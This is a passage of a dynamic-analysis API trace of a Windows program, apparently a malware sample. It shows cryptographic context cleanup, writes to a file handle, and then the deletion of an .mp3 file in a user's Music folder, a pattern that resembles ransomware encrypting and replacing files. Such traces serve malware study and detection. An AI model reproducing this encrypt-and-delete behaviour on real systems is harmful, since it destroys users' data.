wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.139] WriteFile (in: hFile=0x50c, lpBuffer=0x38248d0*, nNumberOfBytesToWrite=0x10c10, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x38248d0*, lpNumberOfBytesWritten=0x8cf5e4*=0x10c10, lpOverlapped=0x0) returned 1 [0206.141] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.141] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.141] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0206.141] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0206.141] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0206.141] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0206.141] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0206.141] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0206.141] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0206.141] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0206.142] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0206.142] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0206.142] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0206.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaadc8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0206.142] CryptDestroyKey (hKey=0x9e2078) returned 1 [0206.142] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0206.142] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0206.142] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0206.142] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0206.142] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0206.142] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0206.142] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0206.142] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0206.142] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0206.142] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0206.142] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0206.142] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0206.142] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0206.142] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0206.142] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0206.143] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0206.143] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0206.143] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0206.143] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0206.143] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0206.143] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0206.143] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0206.143] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0206.143] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.143] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0206.143] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.143] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0206.143] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.143] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.143] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0206.143] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.145] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0206.145] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.145] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.145] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.145] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.145] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0206.145] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0206.145] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0206.145] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0206.145] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0206.145] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.145] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0206.145] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0206.145] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0206.145] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0206.146] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0206.146] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0206.146] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0206.146] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0206.146] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0206.146] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0206.146] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0206.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7080, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0206.146] CryptReleaseContext (hProv=0xa7c7f8, dwFlags=0x0) returned 1 [0206.146] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.146] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0206.146] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0206.146] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0206.146] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0206.146] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0206.146] FreeLibrary (hLibModule=0x76390000) returned 1 [0206.146] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.146] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.146] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.146] CloseHandle (hObject=0x4ac) returned 1 [0206.147] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.147] CloseHandle (hObject=0x50c) returned 1 [0206.150] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.152] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0206.152] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.152] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0206.152] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\JlLewkGtdwovoI.mp3", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\JlLewkGtdwovoI.mp3", lpFilePart=0x8cedf4*="JlLewkGtdwovoI.mp3") returned 0x28 [0206.152] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\JlLewkGtdwovoI.mp3" (normalized: "c:\\users\\fd1hvy\\music\\jllewkgtdwovoi.mp3")) returned 0x20 [0206.152] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\JlLewkGtdwovoI.mp3", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11e87710, ftCreationTime.dwHighDateTime=0x1d5cc5d, ftLastAccessTime.dwLowDateTime=0xea01f5d0, ftLastAccessTime.dwHighDateTime=0x1d5c93e, ftLastWriteTime.dwLowDateTime=0xea01f5d0, ftLastWriteTime.dwHighDateTime=0x1d5c93e, nFileSizeHigh=0x0, nFileSizeLow=0x10c08, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="JlLewkGtdwovoI.mp3", cAlternateFileName="JLLEWK~1.MP3")) returned 0x9e2138 [0206.152] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\JlLewkGtdwovoI.mp3" (normalized: "c:\\users\\fd1hvy\\music\\jllewkgtdwovoi.mp3")) returned 1 [0206.158] FindNextFileW (in: hFindFile=0x9e2138, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11e87710, ftCreationTime.dwHighDateTime=0x1d5cc5d, ftLastAccessTime.dwLowDateTime=0xea01f5d0, ftLastAccessTime.dwHighDateTime=0x1d5c93e, ftLastWriteTime.dwLowDateTime=0xea01f5d0, ftLastWriteTime.dwHighDateTime=0x1d5c93e, nFileSizeHigh=0x0, nFileSizeLow=0x10c08, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="JlLewkGtdwovoI.mp3", cAlternateFileName="JLLEWK~1.MP3")) returned 0 [0206.158] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0206.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74b88 | out: hHeap=0x2af0000) returned 1 [0206.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0206.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0206.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0206.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0206.158] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0206.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0206.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0206.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0206.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0206.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0206.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0206.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0206.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0206.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0206.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0206.159] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0206.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0206.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa768 [0206.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0206.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0206.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa810 [0206.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0206.159] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0206.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0206.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0206.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0206.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0206.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0206.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0206.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0206.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0206.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0206.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0206.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0206.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0206.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0206.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0206.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0206.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74f98 [0206.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0206.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0206.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0206.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0206.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0206.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0206.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0206.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0206.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0206.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0206.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0206.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0206.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0206.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0206.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0206.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0206.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0206.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0206.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0206.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0206.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0206.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x52) returned 0x2a5fa20 [0206.160] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\JlLewkGtdwovoI.mp3", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\JlLewkGtdwovoI.mp3", lpFilePart=0x8cf650*="JlLewkGtdwovoI.mp3") returned 0x28 [0206.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5fa20 | out: hHeap=0x2af0000) returned 1 [0206.160] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\JlLewkGtdwovoI.mp3" (normalized: "c:\\users\\fd1hvy\\music\\jllewkgtdwovoi.mp3")) returned 0xffffffff [0206.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74f98 | out: hHeap=0x2af0000) returned 1 [0206.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0206.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0206.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0206.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0206.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0206.161] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0206.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0206.161] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0206.161] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0206.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0206.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0206.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0206.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0206.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0206.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0206.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 